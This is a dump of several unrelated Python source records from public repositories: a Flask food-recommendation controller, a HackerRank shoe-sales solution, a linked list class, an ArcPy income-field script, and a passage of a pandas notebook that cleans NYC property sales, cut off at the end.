sebagai index\n #df_user.set_index('nama_makanan', inplace=True)\n indices = pd.Series(pref_preprocessing.index,index=pref_preprocessing['nama_makanan']).drop_duplicates()\n\n #locate nama makanan\n #idx = indices[indices == 'preferensi user'].index[0]\n idx = indices['preferensi user']\n\n #do tfidf\n tfidf_matrix = tfidf_func(pref_preprocessing)\n\n #do cosine similarity\n cos_sim = cossim_func(tfidf_matrix)\n\n #do cosine similarity to the user's preference\n sim_scores = enumerate(cos_sim[idx])\n\n #sort based on the highest similarity score\n sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n print(\"ini isi sim_scores: \")\n print(sim_scores)\n print(type(sim_scores))\n print (\"Number of items in the list = \", len(sim_scores))\n print(\"print nonzero:\", np.count_nonzero(sim_scores, axis=0))\n\n #get top 5 recommendations without the user's preference (without score = 1)\n sim_scores = sim_scores[1:7]\n for i in sim_scores:\n print(i)\n sim_index = [i[0] for i in sim_scores]\n print(\"ini isi sim_index:\")\n print(sim_index)\n print(\"ini isi recommended_food:\")\n print(pref_preprocessing['nama_makanan'].iloc[sim_index])\n #recommended_food = print(pref_preprocessing['nama_makanan'].iloc[sim_index])\n recommended_food = pref_preprocessing['nama_makanan'].iloc[sim_index]\n data = {'Nama Makanan':recommended_food,\n 'Energi':pref_preprocessing['energi'].iloc[sim_index],\n 'Protein':pref_preprocessing['protein'].iloc[sim_index],\n 'Lemak':pref_preprocessing['lemak'].iloc[sim_index],\n 'Karbo':pref_preprocessing['karbo'].iloc[sim_index],\n 'Natrium':pref_preprocessing['natrium'].iloc[sim_index],\n 'Bahan - bahan':pref_preprocessing['bahan_bahan'].iloc[sim_index],\n 'Langkah':pref_preprocessing['langkah'].iloc[sim_index],\n 'Pagi':pref_preprocessing['pagi'].iloc[sim_index],\n 'siang':pref_preprocessing['siang'].iloc[sim_index],\n 'malam':pref_preprocessing['malam'].iloc[sim_index]\n }\n data = pd.DataFrame(data)\n return data\n\n\ndef sisaKalori(data):\n pageData = {\n \"breadcrumb\": \"Rekomendasi\",\n \"pageHeader\": \"Sistem Rekomendasi\"\n }\n\n\n #eaten_food_mass = float(eaten_food_mass)\n kalori_harian = 0\n sisa_kalori = 0\n\n #with open('/Users/elisha/flask-project/app/module/food_dataset_seminar.csv', encoding= 'unicode_escape') as csv_file:\n # data_apa = csv.reader(csv_file, delimiter=',')\n # first_line = True\n # dataset = []\n # for row in data_apa:\n # if not first_line:\n # dataset.append({\n # \"nama_makanan\": row[1],\n # \"energi\": row[2],\n # \"protein\": row[3],\n # \"lemak\": row[4],\n # \"karbo\":row[5],\n # \"natrium\" : row[6],\n # \"bahan_bahan\": row[7],\n # \"bahan_stemmed\" : row[8],\n # \"langkah\" : row[9],\n # \"kategori_masakan\": row[10]\n # })\n # else:\n # first_line = False\n\n data_apa = makanancontroller.readMakanan()\n print(data_apa)\n print(type(data_apa))\n df = data_apa.values.tolist()\n print(df)\n first_line = True\n dataset = []\n for row in df:\n if not first_line:\n dataset.append({\n \"nama_makanan\": row[0],\n \"energi\": row[1],\n \"protein\": row[2],\n \"lemak\": row[3],\n \"karbo\":row[4],\n \"natrium\" : row[5],\n \"bahan_bahan\": row[6],\n \"bahan_stemmed\": row[7],\n \"langkah\": row[8],\n \"kategori_masakan\": row[9]\n })\n else:\n first_line = False\n\n #Hitung BMR pengguna\n if (data['jenis_kelamin'] == 2): bmr_u = 10 * data['berat_badan'] + 6.25 * data['tinggi_badan'] - 5 * data['usia'] + 5\n elif (data['jenis_kelamin'] == 1): bmr_u = 10 * data['berat_badan'] + 6.25 * data['tinggi_badan'] - 5 * data['usia'] - 161\n\n #Hitung Kebutuhan Kalori Harian Pengguna\n if (data['tingkat_aktivitas'] == 1): kalori_harian = bmr_u * 1.2\n elif (data['tingkat_aktivitas'] == 2): kalori_harian = bmr_u * 1.375\n elif (data['tingkat_aktivitas'] == 3): kalori_harian = bmr_u * 1.55\n elif (data['tingkat_aktivitas'] == 4): kalori_harian = bmr_u * 1.725\n elif (data['tingkat_aktivitas'] == 5): kalori_harian = bmr_u * 1.9\n \n\n df = pd.DataFrame(dataset)\n #Cek kalori makanan yang sudah dimakan dan Hitung sisa kalori\n eaten_food = clean_split(data['eaten_food'])\n eaten_food_mass = clean_split(data['eaten_food_mass'])\n c_makanan = clean_split(data['c_makanan'])\n print(c_makanan)\n temp_kal = 0\n temp_prot = 0\n temp_nat = 0\n temp_total = kalori_harian\n print(eaten_food_mass)\n for i,st in enumerate(eaten_food):\n print(i,st)\n temp = 0\n temp_2 = 0\n temp_3 = 0\n if (st in df['nama_makanan'].values):\n for j,mass in enumerate(eaten_food_mass):\n if i == j:\n print(st,mass)\n mass = float(mass)\n temp = float(df.loc[df.nama_makanan == st,'energi'])\n #temp_kal = temp_kal + temp\n #print(temp_kal)\n #kalori_eaten_food = temp_kal\n temp_total = temp_total - (temp * (mass/100))\n print(\"ini sisa kalori\")\n print(temp_total)\n temp_2 = float(df.loc[df.nama_makanan == st,'protein'])\n temp_prot = temp_prot + (temp_2 * (mass/100))\n print(temp_prot)\n temp_3 = float(df.loc[df.nama_makanan == st,'natrium'])\n temp_nat = temp_nat + (temp_3 * (mass/100))\n print(temp_nat)\n print(eaten_food_mass)\n for mass in eaten_food_mass:\n temp = 0\n mass = float(mass)\n print(mass)\n #kalori_eaten_food = temp_kal\n protein_eaten_food = temp_prot\n natrium_eaten_food = temp_nat\n sisa_kalori = temp_total\n kalori_pagi = 25 * sisa_kalori / 100\n kalori_siang = 30 * sisa_kalori / 100\n kalori_malam = 25 * sisa_kalori / 100\n kalori_snack_pagi = 10 * sisa_kalori / 100\n kalori_snack_sore = 10 * sisa_kalori / 100\n\n data_user = {\n 'berat_badan': data['berat_badan'],\n 'tinggi_badan': data['tinggi_badan'],\n 'usia': data['usia'],\n 'jenis_kelamin': data['jenis_kelamin'],\n 'tingkat_aktivitas': data['tingkat_aktivitas'],\n 'penyakit': data['penyakit'],\n 'c_makanan': c_makanan,\n 'pref_bahan': data['pref_bahan'],\n 'eaten_food': eaten_food,\n 'eaten_food_mass': eaten_food_mass,\n 'id_user':data['id_user'],\n 'bmr':bmr_u,\n 'kalori_harian':kalori_harian,\n 'sisa_kalori': sisa_kalori\n }\n\n print(\"ini data user:\", data_user)\n #result = save(data_user)\n \n ### INSERT DB ###\n save(data_user)\n\n #Define a new data frame to store the preferred foods. Copy the contents of df to df_user\n df_user = pd.DataFrame(dataset)\n df_u = {'berat_badan': data['berat_badan'],\n 'tinggi_badan': data['tinggi_badan'],\n 'usia': data['usia'],\n 'jenis_kelamin': data['jenis_kelamin'],\n 'aktivitas': data['tingkat_aktivitas'],\n 'penyakit': data['penyakit'],\n 'constraint_makanan': c_makanan,\n 'pref_bahan': data['pref_bahan'],\n 'eaten_food': eaten_food,\n 'eaten_food_mass': eaten_food_mass,\n 'bmr': bmr_u,\n 'kalori_harian': kalori_harian,\n 'sisa_kalori': sisa_kalori,\n 'kalori_pagi': kalori_pagi,\n 'kalori_siang': kalori_siang,\n 'kalori_malam': kalori_malam,\n 'kalori_snack_pagi': kalori_snack_pagi,\n 'kalori_snack_sore': kalori_snack_sore}\n print(type(df_user))\n df_user['protein'] = df_user['protein'].astype(float)\n df_user['natrium'] = df_user['natrium'].astype(float)\n df_user['energi'] = df_user['energi'].astype(float)\n print(type(df_user))\n\n #c_makanan = df_u['constraint_makanan'].values[0]\n #c_makanan = str(c_makanan)\n #print(c_makanan)\n df_user_new = pd.DataFrame(dataset)\n\n #Filter based on the condition\n df_user = df_user[~df_user['kategori_masakan'].str.contains('side_dish')]\n df_user = df_user[df_user['energi'] <= sisa_kalori]\n if (c_makanan == '0'):\n print(df_user)\n print(\"df user sebelum masuk ke filtering:\")\n print(type(df_user))\n print('penyakit:')\n print(data['penyakit'])\n if (data['penyakit'] == '0'): df_user = df_user[(df_user.protein <= (100 - protein_eaten_food)) & (df_user.natrium <= (3000 - natrium_eaten_food))]\n elif (data['penyakit'] == '1'): df_user = df_user[(df_user.protein <= (100 - protein_eaten_food)) & (df_user.natrium <= (3000 - natrium_eaten_food))]\n elif data['penyakit'] == '2': df_user = df_user[(df_user.protein <= (75 - protein_eaten_food)) & (df_user.natrium <= (3000 - natrium_eaten_food))]\n elif (data['penyakit'] == '3'): df_user = df_user[(df_user.protein <= (100 - protein_eaten_food)) & (df_user.natrium <= (2500 - natrium_eaten_food))]\n else: print(\"invalid\")\n print('df_user baru woyyyyy:')\n print(df_user)\n print(type(df_user))\n else:\n #df_user = df_user.where(c_makanan not in df_user['bahan_stemmed'])\n if (data['penyakit'] == '0'): df_user = df_user[(df_user.protein <= (100 - protein_eaten_food)) & (df_user.natrium <= (3000 - natrium_eaten_food))]\n elif (data['penyakit'] == '1'): df_user = df_user[(df_user.protein <= (100 - protein_eaten_food)) & (df_user.natrium <= (3000 - natrium_eaten_food))]\n elif (data['penyakit'] == '2'): df_user = df_user[(df_user.protein <= (75 - protein_eaten_food)) & (df_user.natrium <= (3000 - natrium_eaten_food))]\n elif (data['penyakit'] == '3'): df_user = df_user[(df_user.protein <= (100 - protein_eaten_food)) & (df_user.natrium <= (2500 - natrium_eaten_food))]\n else: print(\"invalid\")\n for cons in c_makanan: \n df_user = df_user[~df_user['bahan_stemmed'].str.contains(cons)]\n print('df_user baru woyyyyy:')\n print(df_user)\n print(type(df_user))\n \n print(\"df user hasil KB:\")\n print(df_user)\n\n df_user['pagi'] = np.round((100 * kalori_pagi / df_user['energi'].values),1)\n print(\"ini porsi pagi:\", df_user['pagi'])\n df_user['siang'] = np.round((100 * kalori_siang / df_user['energi'].values),1)\n print(\"ini porsi siang:\", df_user['siang'])\n df_user['malam'] = np.round((100 * kalori_malam / df_user['energi'].values),1)\n print(\"ini porsi malam:\", df_user['malam']) \n pref_preprocessing = preprocessing(data['pref_bahan'], df_u, df_user)\n #pref_preprocessing\n\n tfidf_train = tfidf_func(df_user)\n #print(tfidf_train)\n\n cossim_train = cossim_func(tfidf_train)\n #print(cossim_train)\n\n personal_recommendations = recommendation_result(pref_preprocessing)\n\n data_df = personal_recommendations\n print(\"ini data_df:\")\n print(data_df.columns.values)\n print(data_df)\n data_df = personal_recommendations.values.tolist()\n print(\"ini list dataframe:\")\n print(data_df)\n print(\"tipe data_Df: \")\n print(type(data_df))\n first_line = True\n dataset_df = []\n for row in data_df:\n #row = row.tolist()\n #print(isinstance(row,list))\n print(\"ini type row:\")\n print(type(row))\n #if (isinstance(row,list)):\n # print(row)\n # dataset_df.append(row)\n if not first_line:\n print(row[1])\n dataset_df.append({\n \"nama_makanan\": row[0],\n \"energi\": row[1],\n \"protein\": row[2],\n \"lemak\": row[3],\n \"karbo\": row[4],\n \"natrium\": row[5],\n \"bahan_bahan\": row[6],\n \"langkah\" : row[7],\n \"pagi\": row[8],\n \"siang\": row[9],\n \"malam\": row[10]\n })\n else:\n first_line = False\n \n data_user_output = {\n 'berat_badan' : data['berat_badan'],\n 'tinggi_badan' : data['tinggi_badan'],\n 'usia' : data['usia'],\n 'kalori_harian' : kalori_harian,\n 'sisa_kalori' : sisa_kalori,\n 'dataset_df' : dataset_df,\n 'kalori_pagi' : kalori_pagi,\n 'kalori_siang' : kalori_siang,\n 'kalori_malam' : kalori_malam,\n 'waktu_makan' : data['waktu_makan']\n }\n id_makanan = personal_recommendations.index\n id_makanan = id_makanan.tolist()\n print(\"list id makanan:\", id_makanan)\n print(type(id_makanan))\n for i in id_makanan:\n data_rekomendasi = {\n 'id_user':data['id_user'],\n 'id_makanan':i\n }\n save_rec(data_rekomendasi)\n #return render_template(\"recommender.html\",\n # pageData=pageData,\n # berat_badan = data['berat_badan'],\n # tinggi_badan = data['tinggi_badan'],\n # usia = data['usia'],\n # kalori_harian = kalori_harian,\n # sisa_kalori = sisa_kalori,\n # menu='data', submenu='data', dataset_df=dataset_df)\n \n return data_user_output\n\n\n \n\n\ndef save(data):\n try:\n print(\"ini data fungsi save\", data)\n berat_badan = data[\"berat_badan\"]\n tinggi_badan = data[\"tinggi_badan\"]\n usia = data[\"usia\"]\n jenis_kelamin = data[\"jenis_kelamin\"]\n tingkat_aktivitas = data[\"tingkat_aktivitas\"]\n penyakit = data[\"penyakit\"]\n c_makanan = str(data[\"c_makanan\"])\n pref_bahan = data[\"pref_bahan\"]\n eaten_food = data[\"eaten_food\"]\n eaten_food_mass = data[\"eaten_food_mass\"]\n id_user = data[\"id_user\"]\n bmr = data[\"bmr\"]\n kalori_harian = data[\"kalori_harian\"]\n sisa_kalori = data[\"sisa_kalori\"]\n\n #tampung constructor nya\n users = User(id_user=id_user, umur=usia, jenis_kelamin=jenis_kelamin, berat_badan=berat_badan, tinggi_badan=tinggi_badan, aktivitas_fisik=tingkat_aktivitas, riwayat_penyakit=penyakit, c_makanan=c_makanan, pref_bahan=pref_bahan, bmr=bmr, jumlah_kalori_per_hari=kalori_harian, sisa_kalori=sisa_kalori)\n db.session.add(users)\n db.session.commit()\n\n return response.success('', 'Sukses menambahkan data user!')\n except Exception as e:\n print(e)\n\n\ndef save_rec(data):\n try:\n print(\"ini data fungsi save\", data)\n id_user = data[\"id_user\"]\n id_makanan = data[\"id_makanan\"]\n\n #tampung constructor nya\n foods = Rekomendasi(id_user=id_user, id_makanan=id_makanan)\n db.session.add(foods)\n db.session.commit()\n\n return response.success('', 'Sukses menambahkan data user!')\n except Exception as e:\n print(e)\n\n\n#get all user\ndef index():\n try:\n #select all\n users = User.query.all()\n #bikin format\n data = formatarray(users)\n return response.success(data, \"success\")\n except Exception as e:\n print(e)\n\n# append to array\ndef formatarray(datas):\n array = []\n\n for i in datas:\n array.append(singleObject(i))\n\n return array\n\n#fungsi format dalam bentuk single object\ndef singleObject(data):\n data = {\n 'id': data.id,\n 'usia': data.umur,\n 'berat_badan': data.berat_badan,\n 'tinggi_badan': data.tinggi_badan,\n 'aktivitas_fisik': data.aktivitas_fisik,\n 'riwayat_penyakit': data.riwayat_penyakit,\n 'pref_bahan': data.pref_bahan,\n 'bmr': data.bmr,\n 'kalori_harian': data.jumlah_kalori_per_hari,\n 'sisa_kalori': data.sisa_kalori,\n 'id_user': data.id_user,\n 'jenis_kelamin': data.jenis_kelamin,\n 'c_makanan': data.c_makanan\n }\n \n return data\n\n\n#get detail user\ndef detail(id_user):\n try:\n data_user = User.query.filter_by(id_user=id_user).first()\n if not data_user:\n return response.badRequest([], 'Tidak ada data user!')\n #data_users = formatUser(data_user)\n data_users = singleUser(data_user)\n #return response.success(data_users, \"success\")\n return data_users\n except Exception as e:\n print(e)\n\ndef singleUser(data_user):\n data = {\n 'id': data_user.id,\n 'usia': data_user.umur,\n 'berat_badan': data_user.berat_badan,\n 'tinggi_badan': data_user.tinggi_badan,\n 'aktivitas_fisik': data_user.aktivitas_fisik,\n 'riwayat_penyakit': data_user.riwayat_penyakit,\n 'pref_bahan': data_user.pref_bahan,\n 'bmr': data_user.bmr,\n 'kalori_harian': data_user.jumlah_kalori_per_hari,\n 'sisa_kalori': data_user.sisa_kalori,\n 'id_user': data_user.id_user,\n 'jenis_kelamin': data_user.jenis_kelamin,\n 'c_makanan': data_user.c_makanan\n }\n\n return data\n\ndef formatUser(data):\n array = []\n for i in data:\n array.append(singleUser(i))\n return array\n\n#update data pref bahan\ndef updateKalori(data):\n#eaten_food_mass = float(eaten_food_mass)\n kalori_harian = float(data['kalori_harian'])\n sisa_kalori = float(data['sisa_kalori'])\n print(sisa_kalori)\n print(kalori_harian)\n print(type(kalori_harian))\n\n with open('/Users/elisha/flask-project/app/module/food_dataset_seminar.csv', encoding= 'unicode_escape') as csv_file:\n data_apa = csv.reader(csv_file, delimiter=',')\n first_line = True\n dataset = []\n for row in data_apa:\n if not first_line:\n dataset.append({\n \"nama_makanan\": row[1],\n \"energi\": row[2],\n \"protein\": row[3],\n \"lemak\": row[4],\n \"karbo\":row[5],\n \"natrium\" : row[6],\n \"bahan_bahan\": row[7],\n \"bahan_stemmed\" : row[8],\n \"langkah\" : row[9],\n \"kategori_masakan\": row[10]\n })\n else:\n first_line = False\n\n df = pd.DataFrame(dataset)\n #Cek kalori makanan yang sudah dimakan dan Hitung sisa kalori\n eaten_food = clean_split(data['eaten_food'])\n eaten_food_mass = clean_split(data['eaten_food_mass'])\n c_makanan = clean_split(data['c_makanan'])\n print(c_makanan)\n temp_kal = 0\n temp_prot = 0\n temp_nat = 0\n temp_total = sisa_kalori\n print(\"ini kalori harian sebelum dihitung lagi\",temp_total)\n print(eaten_food_mass)\n for i,st in enumerate(eaten_food):\n print(i,st)\n temp = 0\n temp_2 = 0\n temp_3 = 0\n if (st in df['nama_makanan'].values):\n for j,mass in enumerate(eaten_food_mass):\n if i == j:\n print(st,mass)\n mass = float(mass)\n temp = float(df.loc[df.nama_makanan == st,'energi'])\n print(temp)\n #temp_kal = temp_kal + temp\n #print(temp_kal)\n #kalori_eaten_food = temp_kal\n print(temp_total)\n temp_total = temp_total - (temp * (mass/100))\n print(\"ini sisa kalori\")\n print(temp_total)\n temp_2 = float(df.loc[df.nama_makanan == st,'protein'])\n temp_prot = temp_prot + (temp_2 * (mass/100))\n print(temp_prot)\n temp_3 = float(df.loc[df.nama_makanan == st,'natrium'])\n temp_nat = temp_nat + (temp_3 * (mass/100))\n print(temp_nat)\n print(eaten_food_mass)\n for mass in eaten_food_mass:\n temp = 0\n mass = float(mass)\n print(mass)\n #kalori_eaten_food = temp_kal\n protein_eaten_food = temp_prot\n natrium_eaten_food = temp_nat\n sisa_kalori = temp_total\n kalori_pagi = 25 * sisa_kalori / 100\n kalori_siang = 30 * sisa_kalori / 100\n kalori_malam = 25 * sisa_kalori / 100\n kalori_snack_pagi = 10 * sisa_kalori / 100\n kalori_snack_sore = 10 * sisa_kalori / 100\n \n print(\"ini sisa kalori: \",sisa_kalori)\n print(\"ini kalori harian: \",kalori_harian)\n data_user = {\n 'id_user':data['id_user'],\n 'kalori_harian':kalori_harian,\n 'sisa_kalori': sisa_kalori\n }\n\n result = ubah(data_user)\n print('ini result eh',result)\n\n\n return result\n\n\ndef ubah(data):\n try:\n #eaten_food = request.form.get('eaten_food')\n #pref_bahan = request.form.get('pref_bahan')\n\n #input = [\n # {\n # 'eaten_food': eaten_food,\n # 'pref_bahan': pref_bahan\n # }\n #]\n\n id_user = data[\"id_user\"]\n kalori_harian = data[\"kalori_harian\"]\n sisa_kalori = data[\"sisa_kalori\"]\n print(sisa_kalori)\n print(\"ini id_user\",id_user)\n\n data_user = User.query.filter_by(id_user=id_user).first()\n data_apa_gitu = singleUser(data_user)\n print(data_apa_gitu)\n #data_user.eaten_food = eaten_food\n #data_user.pref_bahan = pref_bahan\n data_user.sisa_kalori = sisa_kalori\n print(data_user.sisa_kalori)\n\n db.session.commit()\n\n return 'berhasil update'\n except Exception as e:\n print(e)","repo_name":"yesyualeon/food-recommender","sub_path":"app/module/UserController.py","file_name":"UserController.py","file_ext":"py","file_size_in_byte":24282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"483770722","text":"# https://www.hackerrank.com/challenges/collections-counter/problem\n\n# Shoe shop, his shop has x number of shoes\n# He has a list containing the size of each shoe he has in his shop.\n# N number of customers are willing to pay y amount of money\n# only if they get the shoe of their desired size.\n# Compute how much money shop owner earned.\n'''\nSample Input:\n10\n2 3 4 5 6 8 7 6 5 18\n6\n6 55\n6 45\n6 55\n4 40\n18 60\n10 50\n\nSample Output:\n200\n'''\n\n# Solution:\nfrom collections import Counter\n\nshoes = int(input())\nsizes = list(map(int, input().split()))\ncounts = Counter(sizes)\ncustomers = int(input())\nneed = []\nfor i in range(customers):\n temp = input().split()\n need.append(temp)\nmoney = 0\nfor person in need:\n if int(person[0]) in counts:\n if counts[int(person[0])]!=0:\n counts[int(person[0])] -= 1\n money += int(person[1])\nprint(money)\n","repo_name":"Deeraj-Kumar-K/Python_Programs","sub_path":"11 - sell shoes according to sizes/sellShoes.py","file_name":"sellShoes.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72925888153","text":"# Simple Linked List with Python\r\n\r\nclass Node:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next_node = None\r\n\r\n\r\nclass LinkedList:\r\n def __init__(self):\r\n self.head = Node(None)\r\n self.tail = self.head # references head node (same object)\r\n\r\n def append(self, node_val):\r\n next_node = Node(node_val) # new node with given value as value\r\n temp = self.tail # create temp reference to current tail\r\n temp.next_node = next_node\r\n self.tail = next_node\r\n\r\n def prepend(self, node_val):\r\n new_first = Node(node_val)\r\n temp = self.head.next_node\r\n self.head.next_node = new_first\r\n new_first.next_node = temp\r\n\r\n # inserted node will become nth element, nth element will become nth + 1\r\n def insert(self, node_val, index: int):\r\n new_node = Node(node_val)\r\n curr_node = self.head.next_node\r\n prev_node = None\r\n count = 0\r\n while count < index:\r\n prev_node = curr_node\r\n curr_node = curr_node.next_node\r\n count += 1\r\n prev_node.next_node = new_node\r\n new_node.next_node = curr_node\r\n\r\n def get(self, index: int):\r\n count = 0\r\n curr_node = self.head.next_node\r\n while count < index:\r\n curr_node = curr_node.next_node\r\n count += 1\r\n return curr_node.value\r\n\r\n def pop(self, index=-1):\r\n if index == 0:\r\n curr_node = self.head.next_node\r\n self.head.next_node = curr_node.next_node\r\n elif index > 0:\r\n count = 0\r\n curr_node = self.head.next_node\r\n prev_node = None\r\n next_node = None\r\n while count < index:\r\n prev_node = curr_node\r\n curr_node = curr_node.next_node\r\n next_node = curr_node.next_node\r\n count += 1\r\n prev_node.next_node = next_node\r\n elif index == -1:\r\n curr_node = self.head\r\n prev_node = None\r\n while curr_node.next_node:\r\n prev_node = curr_node\r\n curr_node = curr_node.next_node\r\n prev_node.next_node = None\r\n else:\r\n pass\r\n\r\n def __iter__(self):\r\n self.curr_node = self.head\r\n return self\r\n\r\n def __next__(self):\r\n if self.curr_node.next_node:\r\n node_val = self.curr_node.next_node.value\r\n self.curr_node = self.curr_node.next_node\r\n return node_val\r\n raise StopIteration\r\n\r\n def __len__(self):\r\n return sum(1 for _ in self)\r\n\r\n def __str__(self):\r\n node = self.head\r\n out = \"\"\r\n while node.next_node:\r\n out += f\"[{node.next_node.value}] -> \"\r\n node = node.next_node\r\n return out[:-4] # remove trailing arrow\r\n\r\n\r\ndef main():\r\n mylist = LinkedList()\r\n \r\n mylist.append(4)\r\n mylist.append(5)\r\n mylist.append(6)\r\n mylist.append(8)\r\n \r\n mylist.prepend(3)\r\n mylist.prepend(2)\r\n mylist.prepend(1)\r\n mylist.prepend(0)\r\n \r\n mylist.insert(7, 7)\r\n \r\n mylist.pop()\r\n mylist.pop(0)\r\n mylist.pop(5)\r\n \r\n x = mylist.get(1)\r\n \r\n print(x)\r\n\r\n print(mylist)\r\n print(len(mylist))\r\n\r\n for node in mylist:\r\n print(node)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"rowleynt/LinkedLists","sub_path":"Python3/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10320517081","text":"\n# Import system modules\nimport arcpy\nfrom arcpy import env\nimport os\nimport sys\nimport numpy\n\n\n# Overwrite Output\narcpy.env.overwriteOutput = True\n\n# Read the parameter values\n# InputFolder = arcpy.GetParameterAsText(0)\n# OutputFolder = arcpy.GetParameterAsText(1)\nInputFolder = \"D:\\\\MSc Thesis\\\\CCAR Database\\\\1991\\\\Resilience_1991_Input\"\nOutputFolder = \"D:\\\\MSc Thesis\\\\CCAR Database\\\\1991\\\\Resilience_1991_Output\"\n\n# Creating Functions\ndef fcs_in_workspace(InputFolder):\n\n # Create output folder\n if not os.path.exists(OutputFolder):\n os.makedirs(OutputFolder)\n\n # Create loop for copy feature\n suffix = \".shp\"\n for root, subFolders, files in os.walk(InputFolder):\n for fileName in files:\n if fileName.endswith(suffix):\n arcpy.env.workspace = root\n fclist = arcpy.ListFeatureClasses()\n for fc in fclist:\n fc_copy = os.path.join(OutputFolder, fc.strip(\".shp\"))\n fc_path = os.path.join(OutputFolder, fc)\n # fc must be start with upper case character to copy feature correctly\n arcpy.CopyFeatures_management(fc, fc_copy)\n\n # Describe copy featured shapefiles\n desc = arcpy.Describe(fc_path)\n\n # if copy feature is _____\n if desc.name == \"Income_EA.shp\":\n # List the copy feature attribute fields\n fields = arcpy.ListFields(fc_path)\n # Manually enter field names to keep here\n # include mandatory fields name in keepfields\n keepFields = [\"FID\", \"Shape\", \"EA\", \"EA_STR\", \"OID_\", \"COL60\"]\n # Automatically drop fields\n dropFields = [x.name for x in fields if x.name not in keepFields]\n # Delete fields\n arcpy.DeleteField_management(fc_path, dropFields)\n # Converts a feature class to NumPy structured array.\n statsfield = arcpy.da.FeatureClassToNumPyArray(fc_path, (\"COL60\"))\n u = statsfield[\"COL60\"].mean()\n sd = statsfield[\"COL60\"].std()\n factor = u / sd\n # Add z score field\n fieldname = arcpy.ValidateFieldName(\"z_score\")\n arcpy.AddField_management(fc_path, fieldname, \"DOUBLE\", \"\", \"\", 50)\n # Calculate z score Field\n # Change \"factor\" into string to feed calculate field (new format available)\n # print(\"factor: %f\\n\" % factor)\n expression = \"!COL60! * %f\" % factor\n arcpy.CalculateField_management(fc_path, fieldname, expression, \"PYTHON_9.3\")\n # Rename\n arcpy.Rename_management(fc_path, \"Household_Average_Income_Income_1991_DA.shp\")\n\n\nif __name__ == '__main__':\n fcs_in_workspace(InputFolder)\n\n","repo_name":"shawnlcwang/GIS_VancouverSocioeconomicResilienceClusterAnalysis","sub_path":"Flood Resilience Python/RM_Variables_Calculation.py","file_name":"RM_Variables_Calculation.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10161616086","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # **Load Data**\n\n# ## Set up Data Path\n\n# In[758]:\n\n\n## Iniitialization\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport os\n\nDATA_PATH = os.getcwd() + '/data/'\n\n\n# ## Iniitialization\n# import pandas as pd\n# import numpy as np\n# import seaborn as sns\n# import matplotlib.pyplot as plt\n# import os\n# \n# DATA_PATH = os.getcwd() + '/data/'\n\n# In[759]:\n\n\ndf = pd.read_csv(os.getcwd() + 'final.sales.csv',skipinitialspace=True,low_memory=False)\nprint('number of rows:'+str(df.shape[0])+'\\n'+'number of columns:'+str(df.shape[1]))\n\n\n# In[760]:\n\n\ndf.info()\ndf.shape\n\n\n# In[761]:\n\n\ndf.head(5)\n\n\n# # **Data Cleaning**\n\n# ## Edit Column Name\n\n# In[762]:\n\n\ndf = df.loc[:, ~df.columns.str.contains('^Unnamed')]\n\n\n# ## Reformat Part of Object Columns Contents into Numeric \n\n# In[763]:\n\n\ndf['LAND SQUARE FEET']=df['LAND SQUARE FEET'].apply(lambda x: x.replace(',',''))\ndf['LAND SQUARE FEET']=df['LAND SQUARE FEET'].apply(lambda x: x.replace('?',''))\ndf['GROSS SQUARE FEET']=df['GROSS SQUARE FEET'].apply(lambda x: x.replace(',',''))\n\ndf['RESIDENTIAL UNITS']=df['RESIDENTIAL UNITS'].apply(lambda x: x.replace(',',''))\ndf['COMMERCIAL UNITS']=df['COMMERCIAL UNITS'].apply(lambda x: x.replace(',',''))\ndf['TOTAL UNITS']=df['TOTAL UNITS'].apply(lambda x: x.replace(',',''))\n\ndf['SALE PRICE']=df['SALE PRICE'].apply(lambda x: x.replace('$',''))\ndf['SALE PRICE']=df['SALE PRICE'].apply(lambda x: x.replace(',',''))\ndf['SALE PRICE']=df['SALE PRICE'].apply(lambda x: x.replace('-',''))\ndf['SALE PRICE']=df['SALE PRICE'].apply(lambda x: x.replace('?',''))\ndf['SALE PRICE'] = df['SALE PRICE'].str.replace(' ', '').str.replace(str(chr(8377)), '').copy()\ndf['SALE PRICE'].replace('', np.nan, inplace=True)\n\n\n# ## Edit Column Type\n\n# In[764]:\n\n\ndf['LAND SQUARE FEET']=df['LAND SQUARE FEET'].astype(int)\ndf['GROSS SQUARE FEET']=df['GROSS SQUARE FEET'].astype(int)\ndf['SALE PRICE']=df['SALE PRICE'].astype(float)\n\ndf['RESIDENTIAL UNITS']=df['RESIDENTIAL UNITS'].astype(float)\ndf['COMMERCIAL UNITS']=df['COMMERCIAL UNITS'].astype(float)\ndf['TOTAL UNITS']=df['TOTAL UNITS'].astype(float)\ndf['YEAR BUILT']=df['YEAR BUILT'].astype(int)\ndf['TAX CLASS AT TIME OF SALE']=df['TAX CLASS AT TIME OF SALE'].astype(int)\ndf['BOROUGH']=df['BOROUGH'].astype('object')\ndf['SALE DATE']=df['SALE DATE'].astype('datetime64[ns]')\n\n\n# In[765]:\n\n\ndf.info()\n\n\n# ## Remove Na/NaN and Unnecessary Columns\n\n# In[766]:\n\n\ndf.drop(['EASE-MENT','ADDRESS','APARTMENT NUMBER','BUILDING CLASS AT PRESENT','BUILDING CLASS AT TIME OF SALE','NEIGHBORHOOD'], \n axis = 1, inplace=True)\n\n\n# In[767]:\n\n\ndf.isna().sum()\n\n\n# In[768]:\n\n\ndf = df.dropna()\n\n\n# In[769]:\n\n\ndf.isna().sum()\n\n\n# In[770]:\n\n\ndf.fillna('NA', inplace=True)\ndf.isna().sum()\n\n\n# ## Filter Data Values\n\n# ### Sale Price\n\n# In[771]:\n\n\n# remove data records with zip code < 100000\ndf = df[df['SALE PRICE']!=0]\ndf['SALE PRICE'].describe()\n\n\n# In[772]:\n\n\n# Plot the distribution of SALE PRICE\nplt.boxplot(df['SALE 